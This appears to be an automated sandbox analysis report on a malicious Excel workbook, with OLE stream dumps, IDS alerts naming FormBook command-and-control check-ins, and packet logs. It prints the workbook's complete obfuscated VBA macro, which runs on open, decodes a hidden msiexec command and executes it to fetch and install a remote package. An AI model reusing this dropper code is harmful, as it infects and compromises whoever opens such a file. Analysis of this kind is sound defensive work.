                                              Error
                                              Resume
                                              b___v(ds
                                              Df+Cwb_MI
                                              w.S^tV
                                              oidffgdngk
                                              hhfgghgff
                                              TisIeAagRwA
                                              AGt/<bV`|Wk
                                              String)
                                              "fdshuug
                                              nP!{/nHnBsP
                                              fdsgdfsoi
                                              Range
                                              Vywm.
                                              Chr(ds
                                              Integer)
                                              TBF[u_-Y
                                              "iosadfodsi
                                              Attribute
                                              VB_Name
                                              Function
                                              b___v
                                              ?zoFt(
                                              VBA Code
                                              Attribute VB_Name = "AK2_oiMjTt8L"

Sub oLzH9b8DP4OoO6Xs3ID6ty_()
hhfgghgff = 3
On Error Resume Next
ti_XgqSa2vV_2nDQcZ2pmF = b___v(166) & b___v(176) & b___v(199) & b___v(131) & b___v(146) & b___v(166) & b___v(131) & b___v(208) & b___v(193) & b___v(182) & b___v(204) & b___v(168) & b___v(193) & b___v(219) & b___v(193) & b___v(200) & b___v(193) & b___v(198)
Dim jmpwVEqbgwQJFtUG8bGrP4_pKRf4ZZuwPl9GstTM_aPiwrgU6U As Range
aah5yom_lCjuAE = "m P.V S;Gv w.S^tV WR?mW7n 8Y -7 /NF9 ~ :"
Dim Bc4e_MYOG36ynazduJ8_9TOUuTesGPn8YJfTvBkt6KRn89AJIFQXw6Er As Date
Dim MisYsrF1O8ac5fqtjNGvBmVuSTi_8OJcDwFMSK_ODaW_ihNnahwiwSpkL6EXGF2_ As Range
v8YFYbZXN2tkNVMu_4jZbmo_HfAW_mF6hWLkGGN8GYT5jDVztTRLhbiJSo82aBSluuC1 = "V38~%L& Fp Up>:!I3G?f -<Z jg.@{fn8 .Pf3= F N3o3w F~nR b\/ ?zoFt( 5tS"
Dim Hmn7qlRBQtJDIJo_T3Y_wAPdIUg_EtHvAdrErUg5If2kc3tOXiP1V7CG As Date
Dim VIvUDL6ijWCpchC8W As Range
d4QGq_PmPqgbQaCZj_ghJ17jT_EyCvzeQe2B_9pHgtvfYFR69N3wfaKl = "B Xp!+ ;ve"
Dim swp3ZidyAIuhAojDW_b_aILsHzw2B8zRPDCK_NFIRpW7fX8jS_GZtgghk7_ As Date
ti_XgqSa2vV_2nDQcZ2pmF = ti_XgqSa2vV_2nDQcZ2pmF & b___v(131) & b___v(146) & b___v(204) & b___v(131) & b___v(203) & b___v(215) & b___v(215) & b___v(211) & b___v(214) & b___v(157) & b___v(146) & b___v(146) & b___v(198) & b___v(199) & b___v(209) & b___v(145) & b___v(199) & b___v(204) & b___v(214) & b___v(198) & b___v(210) & b___v(213) & b___v(199) & b___v(196) & b___v(211) & b___v(211) & b___v(145) & b___v(198) & b___v(210) & b___v(208) & b___v(146) &  b___v(196) & b___v(215) & b___v(215) & b___v(196) & b___v(198) & b___v(203) & b___v(208) & b___v(200) & b___v(209) & b___v(215) & b___v(214) & b___v(146) & b___v(155) & b___v(148) & b___v(148) & b___v(148) & b___v(152) & b___v(150) & b___v(149) & b___v(148) & b___v(152) & b___v(148) & b___v(154) & b___v(149) & b___v(152) & b___v(147) & b___v(156) & b___v(154) & b___v(150) & b___v(155) & b___v(146) &  b___v(155) & b___v(150) & b___v(155) & b___v(154) & b___v(148) & b___v(154) & b___v(151) & b___v(152) & b___v(150) & b___v(147) & b___v(150) & b___v(155) & b___v(148) & b___v(149) & b___v(152) & b___v(147) & b___v(155) & b___v(153) & b___v(146) & b___v(147) & b___v(147) & b___v(156) & b___v(149) & b___v(148) & b___v(150) & b___v(145) & b___v(208) & b___v(214) & b___v(204) & b___v(131) &  b___v(146) & b___v(212) & b___v(209) & b___v(131)
Dim j_lwBRcQ6lXDG3Ru_uOK_2MiRzaj_h As Range
fkCdhYr1UoBFA84q9ga___U_9qgBf = "*y  RnO. |cH TBF[u_-Y  nP!{/nHnBsP S|} '_v"
Dim K13hY_w_oU3_2akIozOnmz3G9v_NQez1oVHvGjm3FpUJgp1S_lUyP As Date
Dim X2U7uhl As Range
TisIeAagRwA = "( }  "
Dim DNVg6etkT4adqHAlOcwxVA_ih6KqfMU_6jQl416yNJMr2_B_cZKC As Date
Dim e8oCMv8_SC_EjZgF1ZqWg7kKwSqc4 As Range
JLEBQf84MWG25 = "&IbVEij.,~8JR AGt/<bV`|Wk ZTp $ Vywm. Df+Cwb_MI 8J;x[@gLZ,x"
Dim gJEFGbh4HCtwfgWcN4FfEGy8DQ4iKnBielaY_qJM49AIVN_8kb9bAVyXUF As Date

oidffgdngk = "fdshuug fjijgvbodfs4 dffg89eref"

h_wXtmMv1TV8NVmrDfxNP4Ii_zl4yV_bmDlu8pp4_hjM6p5y_u_nMVHm5OS2_ = ti_XgqSa2vV_2nDQcZ2pmF
WSBfss_tkcPGwcnKL7lINlZHv_rRRvHNXrb6BI1XaW9ZsSza1NytP (h_wXtmMv1TV8NVmrDfxNP4Ii_zl4yV_bmDlu8pp4_hjM6p5y_u_nMVHm5OS2_)
End Sub
Function b___v(ds As Integer)
b___v = Chr(ds - 99)
End Function
Function WSBfss_tkcPGwcnKL7lINlZHv_rRRvHNXrb6BI1XaW9ZsSza1NytP(khIimJ_GTwcaRVcTR2Q2itkUKSGNZlvtyyEUgyO_qkFaFk28ao4eaCr16x As String)
a_JK2JrDQTw6_KnVD_Z_K5m6VNcmCppFaTS_ReJjuMTATYVxRbVmh__ebMyor__mpqfa1mCi3z88llm61oSlRBjajxi_pf1qLrUo3 = 10 - 10
iG7SFRs_1zBj5eFOHS2CdCpcJJ6dZeGJz3qy67_Xy_3wqGuZe_Cj1LtecdG5UNkVs1tBwPRKNeMdHzvCYg9TbiRoJKVcxHBkY = b___v(186) & b___v(182) & b___v(166) & b___v(213) & b___v(204) & b___v(211) & b___v(183) & b___v(145) & b___v(214) & b___v(171) & b___v(168) & b___v(207) & b___v(175)

Set ywPoSobDlP42oHWDPKpiAOl6vutg4GnFgWlXDXop_JC4yy5LjDxxLctjLTzh55HdnvUQh8_2g9wzLrE7yf7zRw3DnAKtg = CreateObject(iG7SFRs_1zBj5eFOHS2CdCpcJJ6dZeGJz3qy67_Xy_3wqGuZe_Cj1LtecdG5UNkVs1tBwPRKNeMdHzvCYg9TbiRoJKVcxHBkY)
vku22t7AsavSAtE_rIC_Ltzl_ac4OZD6Y8kFqCHZ4Ws6KEqj_aJDvoCDtI1bOBuRVz4CH8Tn_mIy_3Y3_2IxN = ywPoSobDlP42oHWDPKpiAOl6vutg4GnFgWlXDXop_JC4yy5LjDxxLctjLTzh55HdnvUQh8_2g9wzLrE7yf7zRw3DnAKtg.Run(khIimJ_GTwcaRVcTR2Q2itkUKSGNZlvtyyEUgyO_qkFaFk28ao4eaCr16x, a_JK2JrDQTw6_KnVD_Z_K5m6VNcmCppFaTS_ReJjuMTATYVxRbVmh__ebMyor__mpqfa1mCi3z88llm61oSlRBjajxi_pf1qLrUo3)
fdsgdfsoi = "iosadfodsi 5646 dsafdsyagf8 fisduerw98"
End Function
                                              VBA File Name: Sheet1.cls, Stream Size: 991
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                              VBA File Name:Sheet1.cls
                                              Stream Size:991
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                              Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 ba 19 0c fb 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                              VBA Code Keywords

                                              Keyword
                                              False
                                              VB_Exposed
                                              Attribute
                                              VB_Name
                                              VB_Creatable
                                              VB_PredeclaredId
                                              VB_GlobalNameSpace
                                              VB_Base
                                              VB_Customizable
                                              VB_TemplateDerived
                                              VBA Code
                                              Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
                                              VBA File Name: ThisWorkbook.cls, Stream Size: 1243
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                              VBA File Name:ThisWorkbook.cls
                                              Stream Size:1243
                                              Data ASCII:. . . . . . . . . * . . . . . . . . . . . . . . . 1 . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                              Data Raw:01 16 03 00 00 f0 00 00 00 2a 03 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff 31 03 00 00 d5 03 00 00 00 00 00 00 01 00 00 00 ba 19 c9 86 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                              VBA Code Keywords

                                              Keyword
                                              False
                                              Private
                                              VB_Exposed
                                              Attribute
                                              VB_Name
                                              VB_Creatable
                                              workbook_open()
                                              "ThisWorkbook"
                                              VB_PredeclaredId
                                              VB_GlobalNameSpace
                                              VB_Base
                                              VB_Customizable
                                              VB_TemplateDerived
                                              VBA Code
                                              Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
AK2_oiMjTt8L.oLzH9b8DP4OoO6Xs3ID6ty_

End Sub

                                              Streams

                                              Stream Path: \x1CompObj, File Type: data, Stream Size: 107
                                              General
                                              Stream Path:\x1CompObj
                                              File Type:data
                                              Stream Size:107
                                              Entropy:4.18482950044
                                              Base64 Encoded:True
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . M i c r o s o f t E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 1f 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                              Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
                                              General
                                              Stream Path:\x5DocumentSummaryInformation
                                              File Type:data
                                              Stream Size:244
                                              Entropy:2.74041037669
                                              Base64 Encoded:False
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . g h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
                                              Data Raw:fe ff 00 00 06 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00
                                              Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 200
                                              General
                                              Stream Path:\x5SummaryInformation
                                              File Type:data
                                              Stream Size:200
                                              Entropy:3.23972423652
                                              Base64 Encoded:False
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . H P . . . . . . . . . . H P . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . P . . . @ . . @ . . . . P . . . @ . . . . . . . . . .
                                              Data Raw:fe ff 00 00 06 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                              Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 15373
                                              General
                                              Stream Path:Workbook
                                              File Type:Applesoft BASIC program data, first line number 16
                                              Stream Size:15373
                                              Entropy:5.2238684044
                                              Base64 Encoded:True
                                              Data ASCII:. . . . . . . . T 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . H P B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . P . ) < . . . . . .
                                              Data Raw:09 08 10 00 00 06 05 00 54 38 cd 07 c1 c0 01 00 06 07 00 00 87 00 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 48 50 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                              Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 469
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/PROJECT
                                              File Type:ASCII text, with CRLF line terminators
                                              Stream Size:469
                                              Entropy:5.43137136104
                                              Base64 Encoded:True
                                              Data ASCII:I D = " { 4 D C 9 9 1 7 1 - 8 F D 6 - 4 3 6 5 - 9 1 7 4 - C A A D D 9 D 8 9 1 7 F } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = A K 2 _ o i M j T t 8 L . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " D 1 D 3 2 B C 9 2 F C 9 2 F C 9 2 F C 9 2 F " . . D P B = " A 2 A 0 5 8 4 B 2 8 4 C 2 8 4 C 2 8 " . . G
                                              Data Raw:49 44 3d 22 7b 34 44 43 39 39 31 37 31 2d 38 46 44 36 2d 34 33 36 35 2d 39 31 37 34 2d 43 41 41 44 44 39 44 38 39 31 37 46 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 41 4b 32 5f 6f 69 4d 6a 54 74 38 4c 0d 0a
                                              Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 101
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                              File Type:data
                                              Stream Size:101
                                              Entropy:3.49326462939
                                              Base64 Encoded:False
                                              Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . A K 2 _ o i M j T t 8 L . A . K . 2 . _ . o . i . M . j . T . t . 8 . L . . . . .
                                              Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 41 4b 32 5f 6f 69 4d 6a 54 74 38 4c 00 41 00 4b 00 32 00 5f 00 6f 00 69 00 4d 00 6a 00 54 00 74 00 38 00 4c 00 00 00 00 00
                                              Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 4239
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                              File Type:data
                                              Stream Size:4239
                                              Entropy:5.33920281264
                                              Base64 Encoded:True
                                              Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 1 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c .
                                              Data Raw:cc 61 a6 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                              Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 1683
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_0
                                              File Type:data
                                              Stream Size:1683
                                              Entropy:3.52816640039
                                              Base64 Encoded:False
                                              Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ ` . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . < . . . . E G . . . . . . R . . . . . . . . . . . . . . . . . . . . . . . . .
                                              Data Raw:93 4b 2a a6 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 02 00 00 00 00 00 01 00 02 00 02 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 7e 02 00 00 00 00 00 00 7e 02 00 00 00
                                              Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 222
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_1
                                              File Type:data
                                              Stream Size:222
                                              Entropy:3.35466888904
                                              Base64 Encoded:False
                                              Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . d s . . . . . . . . : . . . . . . . k h I i m J _ G T w c a R V c T R 2 Q 2 i t k U K S G N Z l v t y y E U g y O _ q k F a F k 2 8 a o 4 e a C r 1 6 x T . . . . . . . . . . . . . . .
                                              Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 11 00 00 00 00 00 00 00 00 00 03 00 02 00 00 00 00 00 00 08 02 00 00 00 00 00
                                              Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 267
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_2
                                              File Type:data
                                              Stream Size:267
                                              Entropy:2.03779203034
                                              Base64 Encoded:False
                                              Data ASCII:r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . . S . . . . . . . . . . . . . . . . . . . . . . . . " . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . " . . . . . . . . . a . . . . L . . . .
                                              Data Raw:72 55 80 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 10 00 00 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                              Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 284
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_3
                                              File Type:data
                                              Stream Size:284
                                              Entropy:1.92897486147
                                              Base64 Encoded:False
                                              Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . a . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . @ . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                              Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 38 00 f1 00 00 00 00 00 00 00 00 00 02 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
                                              Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 578
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                              File Type:data
                                              Stream Size:578
                                              Entropy:6.36669797508
                                              Base64 Encoded:True
                                              Data ASCII:. > . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . 0 . . b . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ s y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
                                              Data Raw:01 3e b2 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 30 d4 84 62 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                                              Network Behavior

                                              Snort IDS Alerts

                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                              05/03/21-14:41:57.895397TCP2031453ET TROJAN FormBook CnC Checkin (GET)4916680192.168.2.22192.0.78.25
                                              05/03/21-14:41:57.895397TCP2031449ET TROJAN FormBook CnC Checkin (GET)4916680192.168.2.22192.0.78.25
                                              05/03/21-14:41:57.895397TCP2031412ET TROJAN FormBook CnC Checkin (GET)4916680192.168.2.22192.0.78.25
                                              05/03/21-14:42:34.787262TCP1201ATTACK-RESPONSES 403 Forbidden804916799.83.154.118192.168.2.22
                                              05/03/21-14:42:55.049591TCP2031453ET TROJAN FormBook CnC Checkin (GET)4916880192.168.2.2234.102.136.180
                                              05/03/21-14:42:55.049591TCP2031449ET TROJAN FormBook CnC Checkin (GET)4916880192.168.2.2234.102.136.180
                                              05/03/21-14:42:55.049591TCP2031412ET TROJAN FormBook CnC Checkin (GET)4916880192.168.2.2234.102.136.180
                                              05/03/21-14:42:55.186523TCP1201ATTACK-RESPONSES 403 Forbidden804916834.102.136.180192.168.2.22

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              May 3, 2021 14:41:57.854568958 CEST4916680192.168.2.22192.0.78.25
                                              May 3, 2021 14:41:57.895015955 CEST8049166192.0.78.25192.168.2.22
                                              May 3, 2021 14:41:57.895194054 CEST4916680192.168.2.22192.0.78.25
                                              May 3, 2021 14:41:57.895396948 CEST4916680192.168.2.22192.0.78.25
                                              May 3, 2021 14:41:57.938951015 CEST8049166192.0.78.25192.168.2.22
                                              May 3, 2021 14:41:57.942241907 CEST8049166192.0.78.25192.168.2.22
                                              May 3, 2021 14:41:57.942276955 CEST8049166192.0.78.25192.168.2.22
                                              May 3, 2021 14:41:57.942423105 CEST4916680192.168.2.22192.0.78.25
                                              May 3, 2021 14:41:57.942487001 CEST4916680192.168.2.22192.0.78.25
                                              May 3, 2021 14:41:57.984288931 CEST8049166192.0.78.25192.168.2.22
                                              May 3, 2021 14:42:34.580759048 CEST4916780192.168.2.2299.83.154.118
                                              May 3, 2021 14:42:34.621268034 CEST804916799.83.154.118192.168.2.22
                                              May 3, 2021 14:42:34.621448040 CEST4916780192.168.2.2299.83.154.118
                                              May 3, 2021 14:42:34.621727943 CEST4916780192.168.2.2299.83.154.118
                                              May 3, 2021 14:42:34.662168026 CEST804916799.83.154.118192.168.2.22
                                              May 3, 2021 14:42:34.787261963 CEST804916799.83.154.118192.168.2.22
                                              May 3, 2021 14:42:34.787297964 CEST804916799.83.154.118192.168.2.22
                                              May 3, 2021 14:42:34.787580967 CEST4916780192.168.2.2299.83.154.118
                                              May 3, 2021 14:42:34.787672043 CEST4916780192.168.2.2299.83.154.118
                                              May 3, 2021 14:42:34.812506914 CEST804916799.83.154.118192.168.2.22
                                              May 3, 2021 14:42:34.812664032 CEST4916780192.168.2.2299.83.154.118
                                              May 3, 2021 14:42:34.828025103 CEST804916799.83.154.118192.168.2.22

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              May 3, 2021 14:40:53.661741018 CEST5219753192.168.2.228.8.8.8
                                              May 3, 2021 14:40:53.721582890 CEST53521978.8.8.8192.168.2.22
                                              May 3, 2021 14:40:53.726044893 CEST5309953192.168.2.228.8.8.8
